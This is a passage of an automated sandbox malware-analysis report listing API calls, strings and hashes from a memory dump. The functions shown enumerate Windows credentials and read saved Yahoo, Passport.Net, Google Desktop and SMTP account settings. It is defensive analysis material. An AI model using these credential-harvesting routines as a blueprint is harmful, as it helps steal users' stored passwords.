                                                                                            • memcpy.MSVCRT ref: 00406475
                                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                              • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                                                                              • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                                                                            • memcpy.MSVCRT ref: 004064B9
                                                                                            • memcpy.MSVCRT ref: 004064CC
                                                                                            • memcpy.MSVCRT ref: 004064F9
                                                                                            • memcpy.MSVCRT ref: 0040650E
                                                                                              • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID:
                                                                                            • API String ID: 438689982-0
                                                                                            • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                            • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                            • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                            • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                              • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                            • strlen.MSVCRT ref: 0040F7BE
                                                                                            • _mbscpy.MSVCRT ref: 0040F7CF
                                                                                            • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                            • String ID: Passport.Net\*
                                                                                            • API String ID: 2329438634-3671122194
                                                                                            • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                            • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                            • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                            • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                            • memset.MSVCRT ref: 0040330B
                                                                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                            • strchr.MSVCRT ref: 0040335A
                                                                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                            • strlen.MSVCRT ref: 0040339C
                                                                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                            • String ID: Personalities
                                                                                            • API String ID: 2103853322-4287407858
                                                                                            • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                            • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                            • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                            • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                            • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                            • memcpy.MSVCRT ref: 004108C3
                                                                                            Strings
                                                                                            • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                            • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FromStringUuid$memcpy
                                                                                            • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                            • API String ID: 2859077140-3316789007
                                                                                            • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                            • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                            • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                            • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00444573
                                                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValuememset
                                                                                            • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                            • API String ID: 1830152886-1703613266
                                                                                            • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                            • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                            • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                            • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: H
                                                                                            • API String ID: 2221118986-2852464175
                                                                                            • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                            • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                            • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                            • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                            • API String ID: 3510742995-3170954634
                                                                                            • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                            • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                            • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                            • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memset
                                                                                            • String ID: winWrite1$winWrite2
                                                                                            • API String ID: 438689982-3457389245
                                                                                            • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                            • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                            • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                            • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: winRead
                                                                                            • API String ID: 1297977491-2759563040
                                                                                            • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                            • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                            • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                            • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: gj
                                                                                            • API String ID: 1297977491-4203073231
                                                                                            • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                            • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                            • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                            • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 004090C2
                                                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                            • String ID:
                                                                                            • API String ID: 4247780290-0
                                                                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                              • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                              • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                            • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                            • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                            • String ID:
                                                                                            • API String ID: 2775283111-0
                                                                                            • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                            • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                            • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                            • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                            • API String ID: 885266447-2471937615
                                                                                            • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                            • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                            • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                            • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strcmpi$_mbscpy
                                                                                            • String ID: smtp
                                                                                            • API String ID: 2625860049-60245459
                                                                                            • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                            • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                            • memset.MSVCRT ref: 00408258
                                                                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                            Strings
                                                                                            • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close$EnumOpenmemset
                                                                                            • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                            • API String ID: 2255314230-2212045309
                                                                                            • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                                            • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                            • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                                                                            • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040C28C
                                                                                            • SetFocus.USER32(?,?), ref: 0040C314
                                                                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: FocusMessagePostmemset
                                                                                            • String ID: S_@$l
                                                                                            • API String ID: 3436799508-4018740455
                                                                                            • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                            • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004092C0
                                                                                            • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                            • _mbscpy.MSVCRT ref: 004092FC
                                                                                            Strings
                                                                                            • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileString_mbscpymemset
                                                                                            • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                            • API String ID: 408644273-3424043681
                                                                                            • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                            • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                            • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                            • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: _mbscpy
                                                                                            • String ID: C^@$X$ini
                                                                                            • API String ID: 714388716-917056472
                                                                                            • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                            • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                            • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                            • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                            • String ID: MS Sans Serif
                                                                                            • API String ID: 3492281209-168460110
                                                                                            • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                            • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassName_strcmpimemset
                                                                                            • String ID: edit
                                                                                            • API String ID: 275601554-2167791130
                                                                                            • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                            • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: strlen$_mbscat
                                                                                            • String ID: 3CD
                                                                                            • API String ID: 3951308622-1938365332
                                                                                            • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                            • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                            • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                            • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset
                                                                                            • String ID: rows deleted
                                                                                            • API String ID: 2221118986-571615504
                                                                                            • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                            • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                            • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                            • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$memset
                                                                                            • String ID:
                                                                                            • API String ID: 1860491036-0
                                                                                            • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                            • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
